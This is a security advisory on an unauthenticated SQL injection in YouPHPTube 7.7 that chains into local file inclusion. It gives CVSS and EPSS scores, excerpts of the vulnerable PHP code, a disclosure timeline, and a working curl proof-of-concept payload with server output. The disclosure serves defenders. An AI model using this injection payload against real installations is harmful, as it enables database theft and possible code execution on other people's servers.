7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H
0.002 Low
EPSS
Percentile
54.8%
An exploitable SQL injection vulnerability exist in YouPHPTube 7.7. A specially crafted unauthenticated HTTP request can cause a SQL injection, possibly leading to denial of service, exfiltration of the database and local file inclusion, which could potentially further lead to code execution. An attacker can send an HTTP request to trigger this vulnerability.
YouPHPTube 7.7 commit b22e81d25b2a570f4867ea5dce5153ba4c76cc2d (Oct 15th 2019)
<https://www.youphptube.com/>
10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (βSQL Injectionβ)
YouPHPTube is an open-source web application written in PHP which allows to share, upload, and import videos from external websites.
The getVideo
function in /objects/video.php
doesnβt handle user input safely:
static function getVideo($id = "", $status = "viewable", $ignoreGroup = false, $random = false, $suggetedOnly = false, $showUnlisted = false, $ignoreTags = false, $activeUsersOnly = true) {
...
[1] $sql = "SELECT u.*, v.*, "
. " nv.title as next_title,"
. " nv.clean_title as next_clean_title,"
. " nv.filename as next_filename,"
. " nv.id as next_id,"
. " c.id as category_id,c.iconClass,c.name as category,c.iconClass, c.clean_name as clean_category,c.description as category_description,c.nextVideoOrder as category_order, v.created as videoCreation, "
. " (SELECT count(id) FROM likes as l where l.videos_id = v.id AND `like` = 1 ) as likes, "
. " (SELECT count(id) FROM likes as l where l.videos_id = v.id AND `like` = -1 ) as dislikes ";
...
if (empty($id)) {
if (empty($random) && !empty($_GET['videoName'])) {
[2] $sql .= " AND v.clean_title = '{$_GET['videoName']}' ";
} elseif (!empty($random)) {
$sql .= " AND v.id != {$random} ";
$sql .= " ORDER BY RAND() ";
} else if ($suggetedOnly && empty($_GET['videoName']) && empty($_GET['search']) && empty($_GET['searchPhrase'])) {
$sql .= " AND v.isSuggested = 1 ";
$sql .= " ORDER BY RAND() ";
} else {
$sql .= " ORDER BY v.Created DESC ";
}
}
...
$res = sqlDAL::readSql($sql);
[3] $video = sqlDAL::fetchAssoc($res);
sqlDAL::close($res);
...
At [1] the SQL query string is initialized, at [2] the $_GET['videoName']
parameter is extracted from the request and is directly inserted in the query string, which is later executed [3].
This function is reachable by an unauthenticated user by requesting the page /index.php
.
Note that after the query is executed, the view /view/modeYoutube.php
is included in the request, which eventually executes the code block below:
<?php
$vType = $video['type'];
if ($vType == "linkVideo") {
$vType = "video";
} else if ($vType == "live") {
$vType = "../../plugin/Live/view/liveVideo";
} else if ($vType == "linkAudio") {
$vType = "audio";
}
require "{$global['systemRootPath']}view/include/{$vType}.php";
?>
The vType
variable is extracted from one of the columns from the SQL query previously described. This means that an attacker can exploit the SQL injection to include any local php file in the system (LFI), possibly executing arbitrary code.
The following proof-of-concept demonstrates both the SQL injection and the local file inclusion vulnerabilities:
$ time curl -s "http://localhost:8182/?videoName='%20union%20select%20"$(perl -e 'print "1,"x45 . "1234," . "2,"x33')"sleep(3)--%20x"
<b>Warning</b>: require(/var/www/html/view/include/1234.php): failed to open stream: No such file or directory in <b>/var/www/html/view/modeYoutube.php</b> on line <b>273</b><br />
<br />
<b>Fatal error</b>: require(): Failed opening required '/var/www/html/view/include/1234.php' (include_path='.:/usr/local/lib/php') in <b>/var/www/html/view/modeYoutube.php</b> on line <b>273</b><br />
curl -s 0.01s user 0.01s system 0% cpu 6.286 total
The code tried to include the file 1234.php
, and the query took six seconds to execute (the same query is executed twice on the server side).
2019-10-23 - Vendor disclosure
2019-10-29 - Vendor patched
2019-10-30 - Public release
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H
0.002 Low
EPSS
Percentile
54.8%